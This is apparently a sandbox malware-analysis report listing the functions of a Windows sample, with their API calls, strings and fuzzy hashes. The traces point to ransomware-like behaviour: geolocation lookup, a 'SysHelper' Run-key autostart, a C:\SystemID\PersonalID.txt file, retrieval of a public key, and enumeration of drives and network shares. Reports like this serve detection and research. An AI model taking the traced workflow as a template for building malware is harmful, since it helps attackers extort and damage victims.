Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Function 0041F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689sleeptimewindowCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0041F15E
Sleep.KERNEL32(?), ref: 0041F185
Sleep.KERNEL32(?), ref: 0041F19D
SendMessageW.USER32(?,00008003,00000000,00000000), ref: 0041F9D0

Part of subcall function 00410A50: GetLogicalDrives.KERNEL32 ref: 00410A75
Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
Part of subcall function 00410A50: PathFileExistsA.SHLWAPI(?), ref: 00410AF9
Part of subcall function 00410A50: SetErrorMode.KERNEL32(00000000), ref: 00410B02
Part of subcall function 00410A50: GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Strings

C:\, xrefs: 0041F1FC, 0041F267, 0041F709, 0041F72E, 0041F736

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
String ID: C:\
API String ID: 3672571082-3404278061
Opcode ID: d5a943706acf03761f05e91da9d7afe69e2138b39c59b9afd056b2954a2c4063
Instruction ID: 5c6d64671d491e840e8d62e2c9f1d443296aa8abdfe0033865403ad230f1735f
Opcode Fuzzy Hash: d5a943706acf03761f05e91da9d7afe69e2138b39c59b9afd056b2954a2c4063
Instruction Fuzzy Hash: C842B171E003059BDF24DFA8C885BDEB7B1BF44308F14452EE805AB381D779A98ACB95

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: 8daefccbac1f902a0bac6db861613c405983c54fd8b9b57708a0d4339297461f
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: 8daefccbac1f902a0bac6db861613c405983c54fd8b9b57708a0d4339297461f
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

"country_code":", xrefs: 0040CFE1
https://api.2ip.ua/geo.json, xrefs: 0040CF79
Microsoft Internet Explorer, xrefs: 0040CF5A

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: 5dc825e0eaabd0ce8c6fe2fa08b69a878812636430e6fc3930d7ad9179b00fc6
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: 5dc825e0eaabd0ce8c6fe2fa08b69a878812636430e6fc3930d7ad9179b00fc6
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: ecc80bdb03f96bc0c849af2a7dce8c7fffdda80bc7aca4fdda24df6f4d0e1078
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: ecc80bdb03f96bc0c849af2a7dce8c7fffdda80bc7aca4fdda24df6f4d0e1078
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
RegCloseKey.ADVAPI32(00000000), ref: 0040C700
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
RegCloseKey.ADVAPI32(00000000), ref: 0040C72E

Strings

SysHelper, xrefs: 0040C6EB, 0040C71D
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040C6B8

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: CloseValue$OpenQuery
String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
API String ID: 3962714758-1667468722
Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58

Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32(?,?), ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32

Strings

bowsakkdestx.txt, xrefs: 0041EA67
{"public_key":", xrefs: 0041EA2E

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
String ID: bowsakkdestx.txt${"public_key":"
API String ID: 2805819797-1771568745
Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B

Function 0040C500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539

Strings

bowsakkdestx.txt, xrefs: 0040C52D

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
Opcode Fuzzy Hash: 474c6379b963d257ae86b00d206dade7857df39941341afbbe7ce7c2bd65e929
Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9

Function 0041BA80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
ShowWindow.USER32(00000000,00000000), ref: 0041BABE
UpdateWindow.USER32(00000000), ref: 0041BAC5

Strings

LPCWSTRszWindowClass, xrefs: 0041BAA0
LPCWSTRszTitle, xrefs: 0041BA9B

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Window$CreateShowUpdate
String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
API String ID: 2944774295-3503800400
Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C

Function 00410BD0 Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON

Download Yara Rule

APIs

WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00410C12
GlobalAlloc.KERNEL32(00000040,00004000), ref: 00410C39
_memset.LIBCMT ref: 00410C4C
WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: Enum$AllocGlobalOpenResource_memset
String ID:
API String ID: 364255426-0
Opcode ID: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
Opcode Fuzzy Hash: 54b312cc4ee8bd09624119d4c268e334e055f93c635bfd49589b22278edf9028
Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A

Function 00410A50 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00410A75
SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
PathFileExistsA.SHLWAPI(?), ref: 00410AF9
SetErrorMode.KERNEL32(00000000), ref: 00410B02
GetDriveTypeA.KERNEL32(?), ref: 00410B1B

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
String ID:
API String ID: 2560635915-0
Opcode ID: 022c0cbaec9de31487c2f53e095b25542c98f1d89e4a27a999e0cef20fee916b
Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
Opcode Fuzzy Hash: 022c0cbaec9de31487c2f53e095b25542c98f1d89e4a27a999e0cef20fee916b
Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97

Function 00423B4C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00423B64

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007F0000,00000000,00000001,00000001,?,?,?,00430E81,00000001,00000000,?,?,?,00430D1A,0044F284,?), ref: 00420CA5

std::exception::exception.LIBCMT ref: 00423B82
__CxxThrowException@8.LIBCMT ref: 00423B97

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F

Strings

bad allocation, xrefs: 00423B77

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: bad allocation
API String ID: 3074076210-2104205924
Opcode ID: e71a8035136f19667914aa2c051f0735f8eca71ec625d2fce0988d477a71a087
Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
Opcode Fuzzy Hash: e71a8035136f19667914aa2c051f0735f8eca71ec625d2fce0988d477a71a087
Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: fed26c61a6033b0e577b5df8336c7acc378a9dba960c36cc6b3352cf07fcc5bc
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: fed26c61a6033b0e577b5df8336c7acc378a9dba960c36cc6b3352cf07fcc5bc
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA

Part of subcall function 004111C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0041120F
Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00411228
Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0041123D
Part of subcall function 004111C0: MoveFileW.KERNEL32(00000000,?), ref: 00411277

Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73

Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD

GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
TranslateMessage.USER32(?), ref: 0041B4CD
DispatchMessageW.USER32(?), ref: 0041B4D7

Strings

I:\5d2860c89d774.jpg, xrefs: 0041B32F
%username%, xrefs: 0041B283

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
String ID: %username%$I:\5d2860c89d774.jpg
API String ID: 441990211-897913220
Opcode ID: bad3609ad615ec0fe5f5379fd9a4335ddd94e9fd1592faa856105229702b452d
Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
Opcode Fuzzy Hash: bad3609ad615ec0fe5f5379fd9a4335ddd94e9fd1592faa856105229702b452d
Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96

Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
_fputws.LIBCMT ref: 0040C9C6
_fputws.LIBCMT ref: 0040C9E8
_fputws.LIBCMT ref: 0040C9F3

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: _fputws$CreateDirectory
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2590308727-54166481
Opcode ID: 5832548540842a2204f96f055f6058e30fecc92858610139d61e5691a047cee7
Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
Opcode Fuzzy Hash: 5832548540842a2204f96f055f6058e30fecc92858610139d61e5691a047cee7
Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA

Function 0040FD57 Relevance: 3.1, APIs: 2, Instructions: 134fileCOMMON

Download Yara Rule

APIs

PathFindExtensionW.SHLWAPI(?,00000000,-00000002,?,00000000,000000FF), ref: 0040FF4D
_wcsstr.LIBCMT ref: 0040FF7E
_wcsstr.LIBCMT ref: 0040FFC4
_wcsstr.LIBCMT ref: 0040FFEF
_wcsstr.LIBCMT ref: 0041001C
FindNextFileW.KERNELBASE(?,?), ref: 0041005A
FindClose.KERNEL32(?), ref: 0041006C

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
